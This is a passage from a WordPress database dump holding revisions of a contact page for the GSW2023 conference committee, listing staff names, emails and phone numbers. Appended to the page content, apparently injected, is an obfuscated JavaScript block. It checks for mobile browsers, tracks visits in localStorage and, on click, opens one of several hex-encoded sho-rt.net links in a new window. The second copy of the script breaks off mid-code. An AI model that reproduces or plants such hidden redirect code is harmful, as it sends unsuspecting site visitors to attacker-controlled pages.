#000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-07-10 00:29:47','2023-07-10 00:29:47','',4849,'https://gsw2023.com/?p=4978',0,'revision','',0),
(4979,1,'2023-07-10 00:32:51','2023-07-10 00:32:51','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688949164622{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><strong>IT Affairs</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Web Director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Financial Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4939\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Mohamed Abdallah Mahmoud </strong></em></span><br />\nLocal financial Director, GSW2023, Egypt<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tbody>\n<tr>\n<td>Email:</td>\n<td>mohamed_abdallah20102002@yahoo.com</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201141401861</td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 